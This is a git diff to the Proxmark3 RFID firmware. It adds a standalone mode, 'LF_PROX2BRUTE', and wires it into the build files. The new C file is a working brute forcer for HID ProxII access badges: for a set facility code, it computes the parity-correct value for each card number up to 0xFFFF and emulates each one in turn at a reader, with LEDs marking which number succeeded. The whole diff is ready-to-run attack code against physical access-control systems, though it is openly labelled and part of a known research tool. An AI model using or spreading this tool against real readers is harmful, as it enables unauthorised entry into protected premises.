diff --git a/armsrc/Standalone/Makefile.hal b/armsrc/Standalone/Makefile.hal index 6b4510da8..3c18e681b 100644 --- a/armsrc/Standalone/Makefile.hal +++ b/armsrc/Standalone/Makefile.hal @@ -56,6 +56,9 @@ define KNOWN_STANDALONE_DEFINITIONS | LF_PROXBRUTE | HID ProxII bruteforce | | | - Brad Antoniewicz | +----------------------------------------------------------+ +| LF_PROX2BRUTE | HID ProxII bruteforce v2 | +| | | ++----------------------------------------------------------+ | LF_SAMYRUN | HID26 read/clone/sim | | (default) | - Samy Kamkar | +----------------------------------------------------------+ @@ -118,7 +121,7 @@ define KNOWN_STANDALONE_DEFINITIONS +----------------------------------------------------------+ endef -STANDALONE_MODES := LF_SKELETON LF_EM4100EMUL LF_EM4100RSWB LF_EM4100RSWW LF_EM4100RWC LF_HIDBRUTE LF_HIDFCBRUTE LF_ICEHID LF_PROXBRUTE LF_SAMYRUN LF_THAREXDE LF_NEXID +STANDALONE_MODES := LF_SKELETON LF_EM4100EMUL LF_EM4100RSWB LF_EM4100RSWW LF_EM4100RWC LF_HIDBRUTE LF_HIDFCBRUTE LF_ICEHID LF_PROXBRUTE LF_PROX2BRUTE LF_SAMYRUN LF_THAREXDE LF_NEXID STANDALONE_MODES += HF_14ASNIFF HF_14BSNIFF HF_15SNIFF HF_AVEFUL HF_BOG HF_COLIN HF_CRAFTBYTE HF_ICECLASS HF_LEGIC HF_LEGICSIM HF_MATTYRUN HF_MFCSIM HF_MSDSAL HF_TCPRST HF_TMUDFORD HF_YOUNG HF_REBLAY DANKARMULTI STANDALONE_MODES_REQ_BT := HF_REBLAY STANDALONE_MODES_REQ_SMARTCARD := diff --git a/armsrc/Standalone/Makefile.inc b/armsrc/Standalone/Makefile.inc index 05a63f1dd..15218912c 100644 --- a/armsrc/Standalone/Makefile.inc +++ b/armsrc/Standalone/Makefile.inc @@ -29,6 +29,10 @@ endif ifneq (,$(findstring WITH_STANDALONE_LF_PROXBRUTE,$(APP_CFLAGS))) SRC_STANDALONE = lf_proxbrute.c endif +# WITH_STANDALONE_LF_PROX2BRUTE +ifneq (,$(findstring WITH_STANDALONE_LF_PROX2BRUTE,$(APP_CFLAGS))) + SRC_STANDALONE = lf_prox2brute.c +endif # WITH_STANDALONE_LF_HIDBRUTE ifneq (,$(findstring WITH_STANDALONE_LF_HIDBRUTE,$(APP_CFLAGS))) SRC_STANDALONE = lf_hidbrute.c diff --git a/armsrc/Standalone/lf_prox2brute.c b/armsrc/Standalone/lf_prox2brute.c new file mode 100644 index 000000000..0117e91e6 --- /dev/null +++ b/armsrc/Standalone/lf_prox2brute.c @@ -0,0 +1,108 @@ +//----------------------------------------------------------------------------- +// Copyright (C) Brad Antoniewicz 2011 +// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details. +// +// This program is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// This program is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// See LICENSE.txt for the text of the license. +//----------------------------------------------------------------------------- +// LF HID ProxII Brutforce v2 by lnv42 - based on Proxbrute by Brad antoniewicz +// +// Following code is a trivial brute forcer for when you know the facility +// code and want to find valid(s) card number(s). It will try all card +// fnumbers rom CARDNUM_START to CARDNUM_END one by one (max. ~65k tries). +// This brute force will be a lot faster than Proxbrute that will try all +// possibles values for LF low, even those with bad checksum (~4g tries). +// LEDs will help you know which card number(s) worked. +// +//----------------------------------------------------------------------------- +#include "standalone.h" // standalone definitions +#include "proxmark3_arm.h" +#include "appmain.h" +#include "fpgaloader.h" +#include "util.h" +#include "dbprint.h" +#include "lfops.h" +#include "parity.h" + +#define CARDNUM_START 0 +#define CARDNUM_END 0xFFFF +#define FACILITY_CODE 2 + +void ModInfo(void) { + DbpString(" LF HID ProxII bruteforce v2"); +} + +// samy's sniff and repeat routine for LF +void RunMod(void) { + StandAloneMode(); + Dbprintf(">> LF HID proxII bruteforce v2 a.k.a Prox2Brute Started <<"); + FpgaDownloadAndGo(FPGA_BITSTREAM_LF); + + const uint32_t high = 0x20; // LF high value is always 0x20 here + uint32_t low = 0; + + uint32_t fac = FACILITY_CODE, cardnum = 0; + + LED_D_ON(); + while (BUTTON_HELD(200) != BUTTON_HOLD) { // Waiting for a 200ms button press + WDT_HIT(); + // exit from SamyRun, send a usbcommand. + if (data_available()) { // early exit + DbpString("[=] You can take the shell back :) ..."); + LEDsoff(); + return; + } + } + + LED_C_ON(); + WAIT_BUTTON_RELEASED(); // We are now ready to start brutforcing card numbers + LEDsoff(); + + Dbprintf("[=] Starting HID ProxII Bruteforce from card %08x to %08x", + CARDNUM_START, MIN(CARDNUM_END, 0xFFFF)); + + for (cardnum = CARDNUM_START ; cardnum <= MIN(CARDNUM_END, 0xFFFF) ; cardnum++) { + WDT_HIT(); + + // exit from SamyRun, send a usbcommand. + if (data_available()) break; + + // short button press may be used for fast-forward + if (BUTTON_HELD(1000) == BUTTON_HOLD) break; // long button press (>=1sec) exit + + // calculate the new LF low value including Card number, Facility code and checksum + low = (cardnum << 1) | (fac << 17); + low |= oddparity32((low >> 1) & 0xFFF); + low |= evenparity32((low >> 13) & 0xFFF) << 25; + + Dbprintf("[=] trying Facility = %08x, Card = %08x, raw = %08x%08x", + fac, cardnum, high, low); + + // Start simulating an HID TAG, with high/low values, no led control and 20000 cycles timeout + CmdHIDsimTAGEx(0, high, low, 0, false, 20000); + + // switch leds to be able to know (aproximatly) which card number worked (64 tries loop) + LED_A_INV(); // switch led A every try + if ((cardnum-CARDNUM_START) % 8 == 7) // switch led B every 8 tries + LED_B_INV(); + if ((cardnum-CARDNUM_START) % 16 == 15) // switch led C every 16 tries + LED_C_INV(); + if ((cardnum-CARDNUM_START) % 32 == 31) // switch led D every 32 tries + LED_D_INV(); + } + + SpinErr((LED_A | LED_B | LED_C | LED_D), 250, 5); // Xmax tree + Dbprintf("[=] Ending HID ProxII Bruteforce from card %08x to %08x", + CARDNUM_START, cardnum - 1); + DbpString("[=] You can take the shell back :) ..."); + LEDsoff(); // This is the end +}